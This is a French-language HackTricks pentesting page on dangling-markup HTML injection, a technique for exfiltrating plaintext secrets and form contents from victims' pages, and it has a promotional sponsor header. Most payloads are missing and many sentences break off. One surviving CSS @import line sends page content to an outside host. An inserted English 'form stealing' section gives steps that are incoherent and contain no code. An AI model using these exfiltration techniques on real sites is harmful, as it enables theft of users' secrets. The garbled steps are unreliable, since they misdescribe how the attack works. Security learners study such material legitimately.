# Dangling Markup - Injection HTML sans script
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Travaillez-vous dans une **entreprise de cybersécurité** ? Voulez-vous voir votre **entreprise annoncée dans HackTricks** ? ou voulez-vous avoir accès à la **dernière version de PEASS ou télécharger HackTricks en PDF** ? Consultez les [**PLANS D'ABONNEMENT**](https://github.com/sponsors/carlospolop) !
- Découvrez [**The PEASS Family**](https://opensea.io/collection/the-peass-family), notre collection exclusive de [**NFTs**](https://opensea.io/collection/the-peass-family)
- Obtenez le [**swag officiel PEASS & HackTricks**](https://peass.creator-spring.com)
- **Rejoignez le** [**💬**](https://emojipedia.org/speech-balloon/) [**groupe Discord**](https://discord.gg/hRep4RUj7f) ou le [**groupe telegram**](https://t.me/peass) ou **suivez** moi sur **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
- **Partagez vos astuces de piratage en soumettant des PR au [dépôt hacktricks](https://github.com/carlospolop/hacktricks) et au [dépôt hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
## Résumé
Cette technique peut être utilisée pour extraire des informations d'un utilisateur lorsqu'une **injection HTML est trouvée**. Cela est très utile si vous **ne trouvez aucun moyen d'exploiter un** [**XSS** ](xss-cross-site-scripting/) mais que vous pouvez **injecter des balises HTML**.\
Il est également utile si un **secret est enregistré en clair** dans le HTML et que vous voulez l'**exfiltrer** du client, ou si vous voulez tromper l'exécution d'un script.
Plusieurs techniques commentées ici peuvent être utilisées pour contourner certaines [**politiques de sécurité du contenu**](content-security-policy-csp-bypass/) en exfiltrant des informations de manière inattendue (balises html, CSS, balises http-meta, formulaires, base...).
## Applications principales
### Vol de secrets en texte clair
Si vous injectez `@import//hackvertor.co.uk? <--- Injected
steal me!;
```
Vous pouvez également utiliser **`
test
```
### Vol de formulaires
---
#### Description
When a form is submitted, the data is sent to the server and processed. However, sometimes the form is not properly configured and the data is leaked to the attacker.
#### Exploitation
1. Look for forms in the target website.
2. Submit the form with random data.
3. Intercept the request with a proxy tool.
4. Modify the request to include a `Content-Type` header with a value of `text/html`.
5. Add the following code to the request body:
```html
```
6. Forward the modified request to the server.
7. The form data will be sent to the attacker's server.
#### Prevention
- Properly configure the form to prevent data leakage.
- Use HTTPS to encrypt the data in transit.
```markup
```
Ensuite, les formulaires qui envoient des données vers un chemin (comme `